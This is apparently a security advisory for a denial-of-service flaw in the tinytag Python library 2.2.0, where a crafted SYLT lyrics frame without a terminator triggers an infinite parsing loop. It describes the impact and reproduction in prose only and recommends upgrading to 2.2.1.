tinytag Denial-of-Service Vulnerability via Non-Terminating SYLT Frame Parsing Loop
Vulnerability
A denial-of-service vulnerability has been identified in the tinytag Python library, specifically in version 2.2.0. This issue arises when the library parses MP3 files containing ID3v2 SYLT (synchronized lyrics) frames. The vulnerability allows an attacker to create a malicious MP3 file that, when processed by tinytag, triggers an infinite loop in the parsing function. This loop continues indefinitely until the active process or worker is manually terminated. The problem stems from an incorrect assumption in the parsing logic, where the absence of a string terminator in the SYLT frame content leads to a reset of the parsing offset, causing the loop to stall. In server-side applications that automatically handle user-uploaded files, this vulnerability can be exploited with a single 498-byte MP3 file, effectively freezing the parsing operation and disrupting normal workflow.
Impact
Exploitation of this vulnerability causes the tinytag library to enter a non-terminating loop while parsing, leading to a significant disruption in availability. In server-side environments, this can tie up a worker or process responsible for handling metadata extraction, causing delays or interruptions in service. Similarly, in local or desktop applications, opening a malicious MP3 file can cause the program to hang until the task is manually interrupted.
Reproduction
The vulnerability can be reproduced by uploading an MP3 file that contains a crafted ID3v2 SYLT frame without a proper null terminator. This can be done using a Python script that creates such a file and then uses tinytag to parse it. The parsing operation can be monitored to confirm that it does not complete within a reasonable time, indicating that it has gotten stuck in an infinite loop.
Remediation
Users can upgrade to tinytag version 2.2.1, which addresses this vulnerability by ensuring that the string end position function correctly handles cases without a terminator, preventing the infinite loop in SYLT frame parsing.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.